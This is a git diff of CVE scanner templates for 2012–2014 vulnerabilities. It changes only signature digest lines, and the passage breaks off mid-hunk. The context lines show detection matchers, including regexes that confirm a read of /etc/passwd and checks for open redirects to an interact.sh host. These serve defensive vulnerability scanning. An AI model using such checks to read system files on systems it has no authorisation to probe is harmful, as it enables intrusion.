a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index 89b6adbacb..57a2db83c7 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e374adf6c147478410125b5e3b625bb2a7e4ec8df4e386b7879f80f3dd203adf02205b345024f1df4be0c598146291c73d2ae06bd1fc59ac90a35b037656b89c724e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b96c6c74e4798235cec35053af8066d4dc6794a43e3df0b61f63109567e9189022100c8cd5a0b80864664a9fdf6bc321b718f5c0ff878c5350698f3aaa6393a671d6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index 5dc025d5ce..904bfb7219 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009ca2f18ad8d070bdf0207d5fa9fc7624457e456cb19ff4ca43ff61f2de60c45c0220088cd5f5b2c7d4c45bdcc82ff376c9dca3910d4e9548446a1f26cf53a7ee27fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c6a4cabb72bde21bb132b44816b1bd64c1146b68963391fc45f78f2a847cb35022100eba1ae097bcc852f6d363e8f7d8fd65ced366197f06c5f1967617a378dd2752f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 102f0e9039..286a713a33 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220101d33f30f59a0adfa367a4ee987a541972d7875a7ee03b1619f0d08e9f6b3f9022012689b42fe4983793ea90f15cf61c79b12064888b491888ae3002a7399a21322:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f513fcbb707f6870b597e07bdde31074079404931037f69b23312866186588cf022100cffc9642a1750c8be27cb6de66c1984e527cb08df8261a53c592a6909deeeb19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index b2cd77da3a..4c49828d04 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dc98cb6602e352bb8aa5efef1e54d6688d25f22ecbc3efaf5dce9484e5c80bfe02203f7741f62e7ad4d61e9fdc7d9e70ce5d6c6615fd714eba4d750f487ed7c55c29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b3a84923297dce515a989c9a43b3bee4c8f3c31fdfb93e2d763a77022f59bf51022061e6935843ad22eb54f312956180a70d53cc44408b116d5002ef457535087934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index 8b7ad35ea2..0a9a358534 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022048642266c0f379d848603893d9e0c91da5249dd516c781d673e4b095329c23d402206b6f1fdea06b9501e7e5b50a7894d3057c08bc006fed84ec71d16a79e2076b90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df385e30d328b80da4b6c9904af41285b8b741ca53a993dad0e0890bd2a2f15502203fd8dcce02a5490e27f62698143778bf2a7d93367779818b553ffa4a81cc41bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 9535d2cef9..dadef786a4 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -48,4 +48,4 @@ http: part: body words: - '{{md5(string)}}' -# digest: 490a0046304402201ac0c2b72933df8c0fb7ef1c5a6a19a79cd40e76379881895be285e80251e69102203260f22d356f293b8ba1f047f27246d4f8c53067e6d42af2772d64392ea8fa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022022ce5c4f17e4d8fc33d21bc60cf909dfcbb5c85217e1c7fa201caac4702e7d140221008912f28136b2b7554af51f8c82f896a076d16087aa6b5bff6027c4075a4937da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index ec84cf8a73..5426e57f12 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f21929860f7600e354f9be260a27aec7c3f220a6a630a898f7b803336b457902207f97220ddfd8ae7478400d9edce3f4d7acf3ae2560c73bd9a51481eb4b746d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009352954dcdd74fb838167e01395be39d74dca52243c96bf249d09954d7922ba5022100faeed378840240fe1acf3ed021365ac3f1acc04610e0c477fdb951466c280ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index 740b647a0f..e3f4c43eca 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0f19a66f19b9b628c375cbd175da02282d99ce6598b8b245290ebfc19597cd002200365a77812a7640b94ab917c818377a18b3643202d6fd51e7d0063192c7fcfb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a152c975bd407714f7ee31557ef230986900c9b1c6332fc65085667dde221124022100afe88e47680ff10d649c0598333468b836589978fc76a76ec954cc6615ee1dd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 88efcb3730..2f32796650 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -67,4 +67,4 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 490a004630440220313eb38f60fc28f0dce1be3540aaf746cf4c91263f5b48bb9c708d4edec787fb02206c7774b898dcf56316c62f0315acb6ed2b6061ab7dc8146523fb664c34e69ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2b755657c831d182f3e083f1324c8f181ec2a70e19c6017b6c30531c751ffe8022100f1c6303b12279e4b5b7352781958ff2324fd79bc2d862b7b06be52f1e41ee698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index f7f1623cb0..a6e3c72ed6 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d81a01d9e3a4b64bcfd7aac7508ab474d68b724bba198ed9ff8e04c10bcc4f87022100df8bf6fd589da5ec88074d05bdb388d004d46da2b8dd0bf41c3430b97ececb4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a5643ac451046ed36a4bd0abee8e4625b5b9aaab446c88ecdc2de6123ace8ca022100d81885691908ee4848f60a645025945bbb6be535fe1e02995ba96597161ac6fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 19515405fd..f82681390a 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bee2cd95cf9ec0567ff1a5d218e00bcb0bc94a2eb64a02d1eaba4f548c39b260220795d73a5a6109a449ce3e6710b87732e4a3506a6c775f024f82e9abc665fe5cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f1bea933ca3d1732f9ad83368f4cf377156a4bddad1d3c2423e222138422395e02206fd3624c38c3ea36b4d70f18c985bb3e78b1a2f851339fa0e1983173d7ddc32d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 5cf6c3ca28..15b4b7efcd 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ad1450141ffe1e2f5bc5fff041d0ead294f0d0840e282a6899d94c4c3c5a4b602202959bd6bd270091875aafae17397f2d5c2d7ba45419a18a9b77f7c644dcc0df9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204f8f92c2922899207b46b0a7414d8ae6906729368cc5236e2709a80e69c61fa302201b58818ce7172c2d55376f5399cc320d825a21d5e47e73801a0e651c60b21217:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 0338057e99..b7c2900d20 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205596660b46c16f46c755d2225e3fc5684054c8e27fa6b703b994fd0acf54ec0702207a5e8e62ed31287f9914ce7109abe2aea74b8340bfda5b6b2730920832a41b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6b1194c6ae8f5320d7a56775f9cb797dc6c5814de345683c601db5630265a47022100e97d9a7120eecbc820e2306076e3f6814f97f68476d720af764153f521d12892:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 1fd009f975..accdf40bdd 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022004d8fe62c4b1e4ae5fad5b00d2fbb3ac41df89d07c06c9e48d5c952daafaa270022074ccc1e336fd99ee274e49b7329eee333556e948e73146f43ea24bb859d484ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ea7b17222b76afe635b0afb07df36cbbd4a0ddc64064490c057e48d693516932022025d9e8f9fd8c306ad62e0aab881c916004e64d1fffb0880f9348ad1246c89af8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index f890c57174..21229c39db 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206873d1a172063dc9a5a94a9f66edea5ecbe5e334fead9102b967749fc37c8c58022100e18a924b1471c89a90d61dfaa30a48404a730f05848f837747358b8095d8093e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206053a67e4c75600835c22ae91ef4fd397c90fa9b2694c0503f97ba099eb9a0d5022100a8640797cc7a3ee57fe391de4fdb176fcc3441b0d320382db505ade82f522a96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 095685c3f8..2b1431c800 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100a867f8c46181e25c0ee65381c656fd5b0908d6074f18923c3e96c2754c8995b8022100888f743fb311fd2ddba83def7cad4a6946a20a18d6b17fa3ed8b1151808c8154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ec2fe2c080364c2725038246ec86b302494760c76487831383fe67a5752edbe0220430c9fbcc6a09954031a1058ff6bfc3e4ec9108aff02ebc4a0ab7af0f744647e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index 6b48c50ead..62f047c214 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a0047304502200b62703373e2f3e77eb8233099e45a6a4a8f45c65a0bc93dff836558b4cfb495022100c5fdc97c693593011215fd012ea56914958970b70e474b725121e087a9eeb6b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c29af02d64c2d710b335c5a8a86f05e6a9ddc754b21dc4a9f83dedce88c9984f0220277108a1e059287ea4decddab0aac3bcb4a99dd35876e104b2919c01eab48837:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 4fa2b42211..36789d4340 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ea3e56bc8e49a770281df2e8b026ec3be23baa0ef2e3da32f1147ceaf60967f10221009b3c50d18e05bff4a07bb4297543372e6e32f0e6b981d5bc272709148a674f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d919be78f24b6399d013ac974a5f6befc623e0d4e201fc5c1974b38cd8d146710220035ecd90eb365025b639d5c0660a56a44aac430567c209e137a67c272279b641:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 013dd3ec0a..10b2cf7c8c 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4b0a00483046022100c6dc5b887e4ace1683bd8c4f901328e58b99002898e4ca33ed7adf2eead45ac6022100a33436c7adb1f789a65f478a78a2d645cf1b42813d472aa216d6621bb137fe5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dd2aa86d10e6be5f1738aa796ffd9c92e8353df18f5d595923b6318568db4058022069941042036744dbd5b17fd869b34cab85848f1db8fa9df127a07d51dcd9765a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 100e36e4a3..a7dce5184f 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f3c4ea08f6397b41fd80895e319d48ec44eb60d7323eafa2fea35ccd3bf55a47022100d082342c8746730798f1f6bb1b9a2f52cf7276b08735950ba32c192f9ca7b7d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c0a7c8038a6a1b54303fadd95ed235b6ceb902a3d4d0f9b5013c8c70f423ee8022100829d06644ac58eb979bf3a10cc48bc0a375cf7498a367a4207bc921527238603:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index 00c3842261..742f976a69 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a0048304602210097e5f1c5992fd137ee9d5d2670140430f951cc20184ef1ed7a7e29b86b39c799022100a1ee651b62a2b6686d84b3e91e268b379fc002179a6094743d68c357e8ffe4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ff8a98ddb1c2c308eb08b8d79fc1dc2fe5b594fdb7d25398afd47cbbddafda5e02210082fa401f641a39d159006d7f9126437f76c703ab1a812e64c444e6bc06c8f261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 64ccc8c25b..0898a2f4d1 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -64,4 +64,4 @@ http: - 200 - 400 condition: or -# digest: 4a0a00473045022062e0cb846ba394c9a5c920acbb426e26237ddcb9c85be74cfa1934bdfac87c1d022100e2f4211c8c9f909a7ae3a8cc4ee084edefd5263409517af8a3721ea88436d041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e84e436f1f441c80631181ac85badd1fc9886b8d08455a5a08c4780e3cd957dd022100bb8d247e5e75816b9cc487a75474b8e7feef363cfaa59c81b7fc8e9eec73b8de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 37be99a04c..5a20bcae54 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202164b09280ac9e1924ee544d73625fd749c8015fe8680a575c7dffda5863f6470221009100d6ff15c2a8d8c9c666b7b1bc7e9ef94c3b1f08024e4b5977c3627d98a900:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dc6be725ce1fa7221cd40b25f6da20c4d0ee44b8e6a0d422685f0dfaee45ca530221008a1f987a944e6c3a9816e8666409a3e55beff3fcd41c87a64d0abd82a4912c94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 731a8c9f84..01c044e875 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a21403994fa11c37171ef51e05837a5b168e8280718a470854ebb7353afcd8800221009cd3e4b0b4b71be9c3f3051d58491d2dbacdeac9b1fb4384b07abf479c55554e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d19bf8ecabd7a342d56adcd4297422852393ef6cab78e9993256c41d6c2db430220074c888f7d143372b84efadd2f31976fce9a6ff6d731e2f4d7600420e1841a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3827.yaml b/http/cves/2013/CVE-2013-3827.yaml index 03118bbcc8..72ec0ae855 100644 --- a/http/cves/2013/CVE-2013-3827.yaml +++ b/http/cves/2013/CVE-2013-3827.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d411c9cac78be8c4ab9a5bdfbc6d4114b99d7b7056c9bb27e3e32ac184482bea022100f177f6296d1afe8ddedb37e3d67eb07efe63553fae17ea089d4a75ca504e2f5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100966b6b0b4a918a9f1fe55193d0249a46797f4a82799feecc379d2ede00c2f55d022100f685671f8e03e4877d9ea71c119d6f6ccfcb1303458bae06f08b9e555b5de2f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 3e63fa5c58..44204bde37 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d844efa33df37aa48d1267ca2585b084dd379d47dc44ad0b817d8a8b3889609022100da3ab34a223e01b513a86e460c9db9418b2100aa58e1ad8a38f360238672050a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220397810d5ab8ab8b82f64ed1972fcb4abbed706f9505884c65d0a216b8106bf74022100f6a6c3dd9166fb7eb7fc1c173342685ee35ef5484e3393b47a66dba7364882f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index ac3f74f129..b31311fc5f 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c8b364798eeaf67eb8fd9661e357a8d0875baf9aaa10872d9215c2389b1e5c50022100e01427f052b0b4953ed298b952a5765c2b6b35dd3c2c4b157568a808db6bd728:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220315dc27edeacd92d3299ed551a1c5240bb5e5614f6db9563557329a591ce0cab02206a8b19bd91d668619cbeafdeaa4d846d824db2454665b54bd25a4df79e2838f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5979.yaml b/http/cves/2013/CVE-2013-5979.yaml index b3f0897619..0a367dd4ec 100644 --- a/http/cves/2013/CVE-2013-5979.yaml +++ b/http/cves/2013/CVE-2013-5979.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201594ab82faa88c2638b590f8d2290c98cbba2ee290211a02a238f09cdf59789e02206977759c62401acb13c22b225a20b6b17866f8aacf67b8a67590ea7f7b0bc8b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be02fdac786e491610190b50099a0ce87960337c3a64fadd06f6408ebb147fd4022100b3295a49e65f499266d917bc52808ccfae6264f6b448c06983015d0c26d25b51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index f232cefc9d..85c15c787b 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022079dad5452b1c88999fef931cbe9ebdc94b286f675f074daceba867d5b3c98f690221008f233d1dbd073f71171ad3756acc9a91929c93719348f87c26e4c5ba95c7b43e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203db25db5e5e4de50aae341f22577f8b8d710ac7791654e1776574087a8c3811a022100a2d6c799f3f59792aa66f7430884805852e965ce2a6bd7d03c5af47273175891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7091.yaml b/http/cves/2013/CVE-2013-7091.yaml index dcc74225d0..d18c3a90a6 100644 --- a/http/cves/2013/CVE-2013-7091.yaml +++ b/http/cves/2013/CVE-2013-7091.yaml @@ -56,4 +56,4 @@ http: - type: regex regex: - "root=.*:0:0" -# digest: 4a0a00473045022100f6cd40b93273474a23d293f197030390d10be43a736527361263f75941c19a1d02207e345080ec279f07c8b1a96d149c3a01abc367600abfbbf63a85dd89a95ef78b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022018e933dc0b64a50fc2fb2291fe0fe068e3b6ce401606ccfaca77a770b2b90880022100a65f7680f5397809fd6e7166167c9d7fb89e30c85c2c4ce8e5ddf62ff1c513fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index a638342e79..e094bca331 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cce17b78559a95bf2f0943f96165e78642e273d655b3c17c6881820cc40df09f02207f5a415fa7bf76725f80007066ad4921d9425a34255db8d656c34257296adea3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085e6d112ea7ef4a7833a7668c6b051ac44855b70dd7ec05c658983adcf4680ec022006588657644bf9bde06a06488d6bdb794f501662fbd380395fdcd12e2ad45ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index ada7d4c3c8..a5801ff21f 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf1d735e7a763f8e92cbac05244f4058513dca66d977cff22094bf53df82ef05022100d45e86c3b9bc7f43e3339b4eb92a91b8f83331a6ecedfa3cbf9dee6a49453580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020888617dfe71531e618697e0fcccf4fcafa03fe02c295f230589d7449890a0002201f877c208eb1418846e64b8bc9cd8c4677f3f5464219102de5c4a0c3dbe7dea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 157d09e484..627cea34a5 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022023bcec4a925719964d361455cce2d3185288b3dd03c0a9b3a61f8704b16ca756022100e7f90ae800794e873f1ef774d97e8007a67fbc2cf35e4fde660f40f31f262a43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a9d734021576f1426ea4a0bd73c67beadc43c253784846f91ddffd41f597880b022100f7963910ee7952b9952e3441d9815f03d92ed7cac15c88325decc2535dbdc943:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2323.yaml b/http/cves/2014/CVE-2014-2323.yaml index cea3f4dc40..099301f4da 100644 --- a/http/cves/2014/CVE-2014-2323.yaml +++ b/http/cves/2014/CVE-2014-2323.yaml @@ -41,4 +41,4 @@ http: - type: regex regex: - "root:[x*]:0:0:" -# digest: 4b0a00483046022100e371572751932d4a500df96a892091eba4e0a4d8ce6a52634b13e38cd64f05cc022100dcb4be0eedfb4cb66a15ce756a7a6db6b4fd32eb5bd445bc094c025d8706bfd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fc41963e152cb80e35da8316c109132de19ba635d41d2245381f2aaa2dff5cce022100b03b8f8c2427915570f9d5409a48ee44032f1e4e53c6ad8d22c5fb31353f4170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2383.yaml b/http/cves/2014/CVE-2014-2383.yaml index 282e65681c..b8bb69ab43 100644 --- a/http/cves/2014/CVE-2014-2383.yaml +++ b/http/cves/2014/CVE-2014-2383.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205cb959d082fabd4770f37fc68ad58966bd0be9ae6c3d679ca44b58065853a807022100a108783e71b8909c00ec2219ba21bd0eb739d3abc0b5e6b9f9ea0ee7d85cbf69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b7c90a2cfbe459a87dbbb307df3db7b44141074b36c34f8a61575b2ca7591520221009ea5a6ab23f19df671509f8466d795fcbeb8d48d995c89926ced47f9d3c8cd98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2908.yaml b/http/cves/2014/CVE-2014-2908.yaml index aeb09fa129..41976e5eb4 100644 --- a/http/cves/2014/CVE-2014-2908.yaml +++ b/http/cves/2014/CVE-2014-2908.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a67b8f296a38cdec3cc9fadbed079d23964fcd5973e2a30a4ebc3588772051e022100acee6714b419eaf8cf4ab99aef816ab12d1a04410e9aef0c8a18a45744943b0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201e07a87ca92a45e0c3e683810fe75ea4e13ef439d9c0761076ae7b1b3fedf1e402200f35676062726a99b31baaabd9878723ace952a9551ab845fb96fca30fd34799:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index 559529be23..84a5c2a95d 100644 --- 